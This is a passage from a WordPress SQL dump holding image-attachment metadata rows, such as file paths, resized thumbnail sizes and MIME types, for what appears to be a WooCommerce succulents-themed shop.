:5:\"width\";i:1920;s:6:\"height\";i:802;s:4:\"file\";s:39:\"2018/02/landing-background-leaves-3.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:39:\"landing-background-leaves-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-600x251.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-300x125.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-3-1024x428.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:428;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-768x321.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:321;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-3-1536x642.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:642;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-3-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-550x802.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:802;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:40:\"landing-background-leaves-3-1100x802.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:802;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:39:\"landing-background-leaves-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-600x251.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:251;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:39:\"landing-background-leaves-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1232,1295,'_wp_attached_file','2018/01/product13-gallery1.jpg'),(1233,1295,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product13-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product13-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product13-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product13-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product13-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product13-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product13-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product13-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product13-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product13-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product13-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product13-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1234,2239,'_wp_attachment_image_alt','o'),(1235,2269,'_wp_attached_file','2018/02/h8-img-8.jpg'),(1236,2269,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1103;s:6:\"height\";i:337;s:4:\"file\";s:20:\"2018/02/h8-img-8.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h8-img-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:20:\"h8-img-8-600x183.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"h8-img-8-300x92.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:92;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"h8-img-8-1024x313.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:313;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"h8-img-8-768x235.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:235;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h8-img-8-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h8-img-8-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:20:\"h8-img-8-550x337.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"h8-img-8-1100x337.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:20:\"h8-img-8-550x337.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:21:\"h8-img-8-1100x337.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:337;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h8-img-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:20:\"h8-img-8-600x183.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:183;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h8-img-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1237,3312,'_wp_attachment_image_alt',''),(1238,1283,'_wp_attachment_image_alt','o'),(1239,1295,'_wp_attachment_image_alt','a'),(1240,3313,'_wp_attached_file','2018/02/h4-slide1-graphic3.png'),(1241,3313,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:334;s:6:\"height\";i:313;s:4:\"file\";s:30:\"2018/02/h4-slide1-graphic3.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic3-300x281.png\";s:5:\"width\";i:300;s:6:\"height\";i:281;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic3-334x300.png\";s:5:\"width\";i:334;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic3-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h4-slide1-graphic3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h4-slide1-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1242,1296,'_wp_attached_file','2018/01/product13-gallery2.jpg'),(1243,1296,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product13-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product13-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product13-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product13-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product13-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product13-gallery2-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product13-gallery2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product13-gallery2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product13-gallery2-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product13-gallery2-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product13-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product13-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1244,1295,'_wp_attachment_image_alt','a'),(1245,1296,'_wp_attachment_image_alt','a'),(1246,1297,'_wp_attached_file','2018/01/product13-gallery3.jpg'),(1247,1297,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product13-gallery3.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product13-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product13-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product13-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product13-gallery3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product13-gallery3-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product13-gallery3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product13-gallery3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product13-gallery3-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product13-gallery3-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product13-gallery3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product13-gallery3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1248,1296,'_wp_attachment_image_alt','a'),(1249,1297,'_wp_attachment_image_alt',''),(1250,289,'_wp_attachment_image_alt','o'),(1251,942,'_wp_attachment_image_alt','o'),(1252,1299,'_wp_attached_file','2018/01/product14-gallery1.jpg'),(1253,1299,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product14-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product14-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product14-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product14-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product14-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product14-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product14-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product14-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product14-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product14-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product14-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product14-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1254,2269,'_wp_attachment_image_alt','o'),(1255,291,'_wp_attached_file','2018/01/h1-img9.png'),(1256,291,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:214;s:6:\"height\";i:122;s:4:\"file\";s:19:\"2018/01/h1-img9.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img9-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img9-150x122.png\";s:5:\"width\";i:150;s:6:\"height\";i:122;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"h1-img9-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1257,943,'_wp_attached_file','2018/01/h8-slide1-graphic1.png'),(1258,943,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:593;s:6:\"height\";i:342;s:4:\"file\";s:30:\"2018/01/h8-slide1-graphic1.png\";s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"h8-slide1-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic1-300x173.png\";s:5:\"width\";i:300;s:6:\"height\";i:173;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic1-593x300.png\";s:5:\"width\";i:593;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic1-550x342.png\";s:5:\"width\";i:550;s:6:\"height\";i:342;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic1-550x342.png\";s:5:\"width\";i:550;s:6:\"height\";i:342;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"h8-slide1-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h8-slide1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1259,2278,'_wp_attached_file','2018/02/Long-orange-banan.jpg'),(1260,2278,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1285;s:6:\"height\";i:437;s:4:\"file\";s:29:\"2018/02/Long-orange-banan.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"Long-orange-banan-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-600x204.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:204;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"Long-orange-banan-300x102.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:102;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"Long-orange-banan-1024x348